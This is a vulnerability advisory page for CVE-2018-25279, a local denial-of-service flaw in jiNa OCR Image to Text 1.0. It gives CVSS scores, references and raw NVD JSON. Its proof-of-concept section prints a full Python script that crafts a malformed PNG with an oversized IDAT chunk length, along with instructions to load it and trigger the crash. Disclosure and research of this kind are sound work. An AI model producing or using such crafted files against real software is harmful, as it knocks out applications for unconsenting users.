CVE-2018-25279

Description

jiNa OCR Image to Text 1.0 contains a denial of service vulnerability that allows local attackers to crash the application by processing a malformed PNG file. Attackers can create a specially crafted PNG file with an oversized buffer and trigger the crash when the application attempts to convert the file to PDF.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

jiNa OCR Image to Text 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct

# PoC script to generate a malformed PNG file triggering DoS in jiNa OCR 1.0
# This creates a PNG with a massive chunk length to cause a crash during PDF conversion.

def create_malformed_png(filename):
    # Standard PNG Signature
    png_sig = b'\x89PNG\r\n\x1a\n'
    
    # IHDR Chunk (Width: 1, Height: 1, Bit depth: 8, etc.)
    width = 1
    height = 1
    ihdr_data = struct.pack('>IIBBBBB', width, height, 8, 2, 0, 0, 0)
    ihdr_crc = 0x58C41F5D # Pre-calculated CRC for this specific IHDR
    ihdr_chunk = struct.pack('>I', 13) + b'IHDR' + ihdr_data + struct.pack('>I', ihdr_crc)
    
    # Malicious Chunk: Set length to a very large value (e.g., 0xFFFFFFFF)
    # The application will try to allocate this size, leading to a crash.
    bad_length = 0xFFFFFFFF
    chunk_type = b'IDAT'
    # Minimal data + dummy CRC
    malformed_chunk = struct.pack('>I', bad_length) + chunk_type + b'\x00' + struct.pack('>I', 0xDEADBEEF)
    
    with open(filename, 'wb') as f:
        f.write(png_sig)
        f.write(ihdr_chunk)
        f.write(malformed_chunk)
        
    print(f"[+] Malformed PNG file generated: {filename}")
    print("[+] Load this file in jiNa OCR 1.0 and convert to PDF to trigger the crash.")

if __name__ == "__main__":
    create_malformed_png('cve_2018_25279_poc.png')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25279
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25279
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25279/
[4] VulDB https://vuldb.com/cve/CVE-2018-25279
[5] http://www.convertimagetotext.net/downloadsoftware.php
[6] https://www.exploit-db.com/exploits/45380
[7] https://www.vulncheck.com/advisories/jina-ocr-image-to-text-denial-of-service-via-png

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25279", "sourceIdentifier": "[email protected]", "published": "2026-04-26T22:17:28.547", "lastModified": "2026-04-27T18:55:32.883", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "jiNa OCR Image to Text 1.0 contains a denial of service vulnerability that allows local attackers to crash the application by processing a malformed PNG file. Attackers can create a specially crafted PNG file with an oversized buffer and trigger the crash when the application attempts to convert the file to PDF."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "references": [{"url": "http://www.convertimagetotext.net/downloadsoftware.php", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/45380", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/jina-ocr-image-to-text-denial-of-service-via-png", "source": "[email protected]"}]}}